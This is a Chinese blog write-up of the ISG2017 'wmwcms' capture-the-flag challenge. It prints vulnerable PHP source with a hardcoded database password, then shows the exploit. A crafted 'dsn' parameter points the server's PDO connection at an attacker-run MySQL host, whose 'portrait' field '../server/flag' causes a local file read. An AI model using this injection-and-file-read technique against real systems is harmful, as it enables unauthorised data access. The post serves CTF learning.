Chybeta

ISG2017-wmwcms-writeup

发表于 | 分类于 | 阅读次数

ISG2017-wmwcms-writeup

Task

1
2
Can u conquer this crude cms and get flag?
link: http://202.120.7.204:7242

Solution

查看robots.txt,可以发现有压缩包,下载下来后得到源码。

文件目录如下;

public/app.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
try {
    session_start();
    define('APP_PATH', dirname(dirname(__FILE__)) . '/server/');
    error_reporting(0);
    include_once APP_PATH . 'sql.php';
    include_once APP_PATH . 'func.php';
    if (!isset($_GET["action"])) {
        errormsg("action is required.");
    }
    $actions = ["login", "logout", "img"];
    if (!in_array($_GET["action"], $actions)) {
        errormsg('Hacking attempt');
    }
    include APP_PATH . $_GET["action"] . ".php";
} catch (Exception $e) {
}

server/img.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
include_once 'sql.php';
if(!isset($_SESSION['uid'])) {
    $portrait = "img/user.png";
} else {
    $uid = intval($_SESSION['uid']);
    $sql = "select portrait from user where id = ?";
    $sth = $dbh->prepare($sql);
    $sth->execute([$uid]);
    $user = $sth->fetchAll();
    if(count($user) > 0){
        $user = $user[0];
        $portrait = $user["portrait"];
    } else {
        $portrait = "img/user.png";
    }
}
header("Cache-Control: max-age=1, s-maxage=1, no-cache, must-revalidate");
header("Content-type: image/png;charset=gb2312");
echo file_get_contents($portrait);

server/sql.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
include_once 'func.php';
if (isset($_REQUEST['dsn'])){
    $dsn = $_REQUEST['dsn'];
} else{
    $dsn = "wmwcms";
}
$dsn = "mysql:dbname={$dsn}";
$username = 'wmwcms';
$password = '%glVYKTkLtQ22';
$options = array(
    PDO::MYSQL_ATTR_INIT_COMMAND => 'SET names utf8',
    );
$dbh = new PDO($dsn, $username, $password, $options);

先配置远程数据库可以访问。修改/etc/mysql/mysql.conf.d/mysqld.cnf。将里面的bind-address = 127.0.0.1注释掉。

接下来配置mysql。这里我用root身份登陆:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
mysql> USE wmwcms;
Database changed
mysql> CREATE TABLE `user` (
    ->   `id` INT AUTO_INCREMENT,
    ->   `name` VARCHAR(100) NULL,
    ->   `pwd` VARCHAR(64) NOT NULL,
    ->   `portrait` VARCHAR(64) DEFAULT "../server/flag",
    ->   PRIMARY KEY (`id`),
    ->   UNIQUE KEY `Duplicate_name` (`name`)
    -> ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
Query OK, 0 rows affected (0.19 sec)
mysql> INSERT INTO `user` (`name`, `pwd`) values ("test", "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3");
Query OK, 1 row affected (1.06 sec)
mysql> select id,name,pwd,portrait from user;
+----+------+------------------------------------------+----------------+
| id | name | pwd                                      | portrait       |
+----+------+------------------------------------------+----------------+
|  1 | test | a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 | ../server/flag |
+----+------+------------------------------------------+----------------+
1 row in set (0.00 sec)

然后创建wmwcms用户,@后面有个%,表示可以远程登陆:

1
2
mysql> CREATE USER 'wmwcms@%' IDENTIFIED BY "%glVYKTkLtQ22";
Query OK, 0 rows affected (2.35 sec)

并为它授权:

1
2
mysql> grant all privileges on wmwcms.* to 'wmwcms'@'%' identified by '%glVYKTkLtQ22';
Query OK, 0 rows affected, 1 warning (0.03 sec)

这样当我们传入的GET参数为dsn=wmwcms;host=yourvps;port=yourport,后端的sql.php中的pdo会去连接你远程的数据库。之后执行img.php时,从中取出的portrait为我们数据库中的portrait字段,这里为../server/flag。继续执行则到了echo file_get_contents($portrait);,也即执行echo file_get_contents("../server/flag");

为什么数据库中要设置成../server/flag,注意app.php是在public文件的,而且默认的$portrait = "img/user.png",也表明是在public文件夹下。而从源码中可知,flag在server文件夹下,所以需要返回上一层文件夹才能读取。

flag:

1
ISG{a107063477b1dd64dabbcaeebf636f7b}

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:ISG2017-wmwcms-writeup

文章作者:chybeta

发布时间:2017年08月31日 - 16:08

最后更新:2017年08月31日 - 18:08

原始链接:http://chybeta.github.io/2017/08/31/ISG2017-wmwcms-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。